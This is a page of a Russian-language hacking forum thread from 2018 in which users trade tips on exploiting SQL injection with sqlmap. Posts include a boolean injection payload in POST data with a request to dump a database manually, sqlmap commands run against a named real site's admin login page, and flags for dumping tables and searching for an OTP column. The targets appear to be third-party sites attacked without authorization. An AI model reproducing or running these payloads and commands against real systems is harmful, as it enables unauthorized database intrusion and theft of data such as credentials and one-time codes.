HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #651  
Старый 18.04.2018, 16:41
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Кидай сылку
 
Ответить с цитированием

  #652  
Старый 18.04.2018, 18:32
LoginUserName
Guest
Сообщений: n/a
Провел на форуме:
1064

Репутация: 0
По умолчанию

Цитата:
Сообщение от cat1vo  
cat1vo said:

Скорее всего это не sqlmap сливает "криво", а скрипт в котором найдена инъекция экранирует слеши. Попробуйте проверить руками вывод!
А вы пробовали вручную получить результат? Или кроме как через sqlmap работать с инъекцией в БД вы не умеете? sqlmap - не панацея!
К сожалению, в ручную не особо умею. Можете подсказать, как в ручную по этапно слить базу с такой уязвимость

Post данные

Код:
Code:
sasai=-1'%20OR%203*2*1=6%20AND%20000646=000646%20--%20
Буду благодарен
 
Ответить с цитированием

  #653  
Старый 18.04.2018, 22:16
cna
Guest
Сообщений: n/a
Провел на форуме:
2613

Репутация: 1
По умолчанию

$?пм или читай //threads/43966/

исп норм соответствие урленкоде с --no-cast --hex --text-only кодировку можно указывать и енкодинг разный так же влияет при блиндах таймауты и конечно --drop-set-cookie --flush-session
 
Ответить с цитированием

  #654  
Старый 18.04.2018, 22:30
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

Код:
Code:
root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql
Эвристический анализ сообщал об уязвимости, а -v 3 говорил неа.

Такой же результат был при

Код:
Code:
root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1"
--level=1 --risk=1 --banner -v 3 --union-cols=1-66
--dbms="MySQL" --technique=EBU --identify-waf --no-cast
Использовал параметры не только на

Код:
Code:
http://advert.kp.ru/admin//index.phpно и на http://advert.kp.ru/admin//login.php
Во втором случае мне сразу говорил sqlmap, что уязвимость отсутствует.
 
Ответить с цитированием

  #655  
Старый 19.04.2018, 16:54
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Вытащил BD и когда прописую команду для того чтобы просмотреть tables он начинает заново крутить скулю, чё за нах ?

второй раз такая фигня как поставил последнюю версию sqlmap раньше не когда такого не было
 
Ответить с цитированием

  #656  
Старый 19.04.2018, 16:56
LoginUserName
Guest
Сообщений: n/a
Провел на форуме:
1064

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

Вытащил BD и когда прописую команду для того чтобы просмотреть tables он начинает заново крутить скулю, чё за нах ?
второй раз такая фигня как поставил последнюю версию sqlmap раньше не когда такого не было
Пропиши payload, с помощью которого залез в бд
 
Ответить с цитированием

  #657  
Старый 18.05.2018, 21:42
x10
Guest
Сообщений: n/a
Провел на форуме:
107142

Репутация: 1
По умолчанию

Друзья подскажите пожалуйста нашел уязвимость

A cookie has been set without the secure flag, which means that the cookie can be accessed via unencrypted connections.

Файл cookie установлен без безопасного флага, а это означает, что к файлу cookie можно получить доступ через незашифрованные соединения.

Как это реализовать?
 
Ответить с цитированием

  #658  
Старый 18.05.2018, 23:39
x10
Guest
Сообщений: n/a
Провел на форуме:
107142

Репутация: 1
По умолчанию

Не ругайте сторого куки эксплуатируются по запросу или по ответу сервера

Я только учусь =(
 
Ответить с цитированием

  #659  
Старый 20.05.2018, 17:08
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Как выглядит запрос для поиска по колонкам ?

Мне нужна колонка с названием OTP как будет выглядеть параметр для поиска ?
 
Ответить с цитированием

  #660  
Старый 20.05.2018, 17:39
Shubka75
Guest
Сообщений: n/a
Провел на форуме:
11851

Репутация: 30
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

Как выглядит запрос для поиска по колонкам ?
Мне нужна колонка с названием OTP как будет выглядеть параметр для поиска ?
--search -C OTP
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ